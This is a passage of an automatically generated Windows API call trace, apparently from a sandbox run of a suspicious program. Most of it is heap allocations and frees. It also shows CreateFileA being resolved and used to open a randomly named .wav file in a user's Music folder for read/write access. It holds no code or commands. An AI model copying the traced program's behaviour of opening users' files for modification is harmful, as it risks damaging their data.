HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.392] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdaf8 [0187.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdaf8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.393] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0187.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdaf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.393] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", cchWideChar=88, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 88 [0187.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x58) returned 0x8c4a48 [0187.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", cchWideChar=88, lpMultiByteStr=0x8c4a48, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav", lpUsedDefaultChar=0x0) returned 88 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.395] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\xxiiq96uf_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0187.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0187.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=88, lpWideCharStr=0x8e6f00, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.wav") returned 88 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.398] FreeLibrary (hLibModule=0x75990000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0187.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.400] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0187.401] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 